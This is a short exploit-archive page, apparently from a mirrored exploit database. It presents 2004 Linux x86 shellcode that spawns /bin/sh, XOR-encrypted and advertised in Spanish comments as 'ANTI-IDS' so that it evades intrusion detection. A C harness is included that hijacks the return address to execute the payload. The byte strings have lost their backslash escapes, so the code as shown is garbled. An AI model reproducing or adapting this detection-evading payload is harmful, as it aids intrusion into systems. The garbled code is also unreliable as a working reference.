[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : linux/x86 execve /bin/sh encrypted 58 bytes
# Published : 2004-09-12
# Author : Matias Sedalo
# Previous Title : linux/x86 break chroot 46 bytes
# Next Title : linux/x86 break chroot execve /bin/sh 80 bytes


/* !!!!!! PRIVATE !!!!!!!

   // ANTI-IDS SHELLCODE //
   // !!!!!!!!!!!!!!!!!! //

   s0t4ipv6@shellcode.com.ar
   0x1d abril 0x7d2
   ./test.c

   !!! Shellcode (execve sh) Encriptada 
   !!! AHORA EN 58 BYTES !!!!!!!!!!!!!!

   Notese que la encripcion se ha hecho a toda la shellcode y no solamente al string /bin/sh.

   Perteneciente al paquete JempiScodes.tgz, por Matias Sedalo <s0t4ipv6@shellcode.com.ar>.
   http://www.shellcode.com.ar/Projects/JempiScodes(version).tgz !!

   En caso de requerirla para otra plataforma, dentro de la linea BSD. Mailme.

*/
#include <stdio.h>

char shellcode[]= 

"xebx1bx5fx31xc0x6ax53x6ax18x59x49x5bx8ax04x0f" // 0x14 de mayo
"xf6xd3x30xd8x88x04x0fx50x85xc9x75xefxebx05xe8"
"xe0xffxffxffx1cx7fxc5xf9xbexa3xe4xffxb8xffxb2"
"xf4x1fx95x4exfex25x97x93x30xb6x39xb2x2c";		// ***********

/*
"xebx29x31xc0x31xdbx8bx24x24x29xd2x4ax31xc9xb1"
"x18xb3x53x8ax04x0cxf6xd3x30xd8x88x04x17x86xc3"
"x49x4ax85xc9x75xeex42x89xecx01xd7x57xc3xe8xd2"
"xffxffxffx53x1cx7fxc5xf9xbexa3xe4xffxb8xffxb2"
"xf4x1fx95x4exfex25x97x93x30xb6x39xb2x2c";
*/

void main() {
	int *ret;
	ret = (int *)&ret +2;
        printf("Shellcode lenght=%dn",strlen(shellcode));
	(*ret) =(int)shellcode;
}

// ANTI-IDS SHELLCODE //
// !!!!!!!!!!!!!!!!!! //

// www.Syue.com [2004-09-12]